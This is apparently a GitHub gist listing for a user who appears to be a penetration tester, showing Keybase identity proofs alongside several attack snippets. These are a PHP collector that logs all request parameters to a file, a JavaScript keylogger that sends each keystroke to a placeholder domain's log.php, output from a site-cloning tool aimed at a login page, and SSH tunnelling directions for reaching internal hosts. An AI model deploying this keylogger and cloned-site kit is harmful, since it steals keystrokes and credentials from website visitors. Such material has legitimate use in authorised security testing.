Skip to content

Instantly share code, notes, and snippets.

View gist:8e8dc59abff729ad292b
### Keybase proof
I hereby claim:
* I am tatanus on github.
* I am adamcompton (https://keybase.io/adamcompton) on keybase.
* I have a public key whose fingerprint is 3313 225D 8EA8 0018 1623 3E9A 60DB 8BD4 1C7A 960B
To claim this, I am signing this object:
View gist:c5dc9999393e99848a4d
Verifying myself: My Bitcoin username is +tatanus. https://onename.io/tatanus
View keybase.md

Keybase proof

I hereby claim:

  • I am tatanus on github.
  • I am adamcompton (https://keybase.io/adamcompton) on keybase.
  • I have a public key whose fingerprint is 7A71 DF0B F490 5F4F EF95 AEB3 D32B 2743 762D 5196

To claim this, I am signing this object:

View log.php
<?php
$file = 'LOG.txt';
$arr= $_REQUEST;
$fp = fopen($file, 'a');
foreach ($arr as $key => $value) {
$toFile = "Key: $key; Value: $value \n";
fwrite($fp, "$toFile");
}
fclose($fp);
?>
View simple_keylogger.js
document.onkeypress = function(e) {
k = (window.event) ? window.event.keyCode : e.which;
k = String.fromCharCode(k);
new Image().src = 'http://<DOMAIN>/log.php?c=' + k;
}
View sample_output_clonesite.py
# python clonesite.py "http://www.safelogin.co" "safelogin" log.php
CLONING URL [http://www.safelogin.co]
FOUND A NEW LINK [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
FOUND A NEW LINK * [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
BAD URL [http://yui.yahooapis.com/3.2.0/build/cssreset/reset-min.css]
FOUND A NEW LINK [http://www.safelogin.co/css/bootstrap.css]
FOUND A NEW LINK * [/css/bootstrap.css]
CLONING URL [http://www.safelogin.co/css/bootstrap.css]
FOUND A NEW LINK [http://www.safelogin.co/img/glyphicons-halflings.png]
FOUND A NEW LINK * [/img/glyphicons-halflings.png]
View complete_keylogger.js
window.onload = function load(){
if (window.addEventListener) {
document.addEventListener('keypress', p, true);
document.addEventListener('keydown', d, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', p);
document.attachEvent('onkeydown', d);
} else {
document.onkeypress = p;
document.onkeydown = d;
View multi hop ssh socks proxy Directions
Command to run:
ssh -L 2222:localhost:8501 user@remoteserver.com
where 2222 is the local port mapping it can be any number above 1000
where localhost must be set to localhost and refers to your current connection
where 8501 is the port you will be opening up on the remote machine
where user@remoteserver.com is the first hop in your quest for internal access
You can’t perform that action at this time.